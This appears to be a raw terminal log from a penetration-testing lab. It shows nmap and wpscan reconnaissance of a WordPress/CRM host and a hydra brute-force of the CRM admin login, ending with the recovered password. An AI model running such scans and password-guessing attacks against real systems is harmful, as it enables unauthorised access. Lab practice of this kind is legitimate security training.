
crm

a guest
Oct 9th, 2017
root@kapirotohat:~# nmap -sS -A -n 192.168.101.10-11

Starting Nmap 7.40 ( https://nmap.org ) at 2017-10-09 21:52 -03
Nmap scan report for 192.168.101.10
Host is up (0.73s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: SMTP: EHLO 220 mail.ptest.lab ESMTP Postfix (Debian/GNU)\x0D
80/tcp open http nginx 1.12.1
|_http-title: 403 Forbidden
88/tcp open hadoop-datanode Apache Hadoop 1.6.2
| hadoop-datanode-info:
|_ Logs: login-header
|_hadoop-jobtracker-info:
| hadoop-tasktracker-info:
|_ Logs: login-header
|_hbase-master-info:
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx/1.6.2
|_http-title: Users
8080/tcp open http nginx
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|WAP|general purpose|printer|webcam
Running (JUST GUESSING): Crestron 2-Series (88%), Asus embedded (86%), Linux 3.X|2.6.X (86%), HP embedded (86%), AXIS embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:3.1 cpe:/o:linux:linux_kernel:2.6.17 cpe:/h:axis:210a_network_camera cpe:/h:axis:211_network_camera
Aggressive OS guesses: Crestron XPanel control system (88%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), HP PSC 2400-series Photosmart printer (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: -mail.ptest.lab

TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
- Hops 1-2 are the same as for 192.168.101.11
3 758.72 ms 192.168.101.10

Nmap scan report for 192.168.101.11
Host is up (0.72s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|_ 1024 50:f9:23:6f:7e:3f:bb:68:77:5e:44:99:4d:51:9b:92 (DSA)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|WAP|general purpose|printer|webcam
Running (JUST GUESSING): Crestron 2-Series (88%), Asus embedded (86%), Linux 3.X|2.6.X (86%), HP embedded (86%), AXIS embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:3.1 cpe:/o:linux:linux_kernel:2.6.17 cpe:/h:axis:210a_network_camera cpe:/h:axis:211_network_camera
Aggressive OS guesses: Crestron XPanel control system (88%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), HP PSC 2400-series Photosmart printer (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 2222/tcp)
HOP RTT ADDRESS
1 758.28 ms 10.10.0.1
2 758.55 ms 172.0.1.1
3 760.72 ms 192.168.101.11

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 204.82 seconds

root@kapirotohat:~# wpscan -a "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" -u 192.168.101.10
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 2.9.2
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.101.10/
[+] Started: Mon Oct 9 21:58:39 2017

[!] The WordPress 'http://192.168.101.10/readme.html' file exists exposing a version number

[+] WordPress version 4.8 (Released on 2017-06-08) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 7 vulnerabilities identified from the version number

[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8905
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
[i] Fixed in: 4.8.2

[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8910
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41398
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
[i] Fixed in: 4.8.2

[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
Reference: https://wpvulndb.com/vulnerabilities/8911
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41457
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
[i] Fixed in: 4.8.2

[!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer
Reference: https://wpvulndb.com/vulnerabilities/8912
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41397
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
[i] Fixed in: 4.8.2

[!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
Reference: https://wpvulndb.com/vulnerabilities/8913
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41448
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
[i] Fixed in: 4.8.2

[!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
Reference: https://wpvulndb.com/vulnerabilities/8914
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41395
Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
[i] Fixed in: 4.8.2

[!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://core.trac.wordpress.org/ticket/25239
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295

[+] WordPress theme in use: twentyseventeen - v1.3

[+] Name: twentyseventeen - v1.3
| Latest version: 1.3 (up to date)
| Location: http://192.168.101.10/wp-content/themes/twentyseventeen/
| Readme: http://192.168.101.10/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://192.168.101.10/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
| Author: the WordPress team
| Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
| 1 plugin found:

[+] Name: kittycatfish-2.2 - v2.2
| Location: http://192.168.101.10/wp-content/plugins/kittycatfish-2.2/
| Readme: http://192.168.101.10/wp-content/plugins/kittycatfish-2.2/readme.txt

[+] Finished: Mon Oct 9 22:01:21 2017
[+] Requests Done: 63
[+] Memory used: 63.863 MB
[+] Elapsed time: 00:02:41
root@kapirotohat:~# hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%3A1d24833a22417d1d4e19be2c43ff5021e2ff5a5a%2C1500076613&username=^USER^&password=^PASS^:Invalid username or password." -l admin -P '/root/Área de trabalho/backup kapiroto/WORDLIST/letrasminus.txt' -t 20 -o crm.txt
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-09 22:37:52
[ERROR] Maximum number of passwords is 50000000, this file has 308915777 entries.

root@kapirotohat:~# cd /root/Área\ de\ trabalho/backup\ kapiroto/WORDLIST/
root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# ls
azmaiu.txt letrasminus.txt nume.txt
root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# split --lines 5000000 letrasminus.txt
root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%3A1d24833a22417d1d4e19be2c43ff5021e2ff5a5a%2C1500076613&username=^USER^&password=^PASS^:Invalid username or password." -l admin -P '/root/Área de trabalho/backup kapiroto/WORDLIST/xbl' -t 20 -o crm.txt
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-09 23:16:42
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 20 tasks per 1 server, overall 64 tasks, 4999999 login tries (l:1/p:4999999), ~3906 tries per task
[DATA] attacking service http-post-form on port 88
[STATUS] 149.00 tries/min, 149 tries in 00:01h, 4999850 to do in 559:17h, 20 active
[STATUS] 147.33 tries/min, 442 tries in 00:03h, 4999557 to do in 565:34h, 20 active
[STATUS] 147.29 tries/min, 1031 tries in 00:07h, 4998968 to do in 565:41h, 20 active
[88][http-post-form] host: 192.168.101.10 login: admin password: blackstar
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-09 23:29:05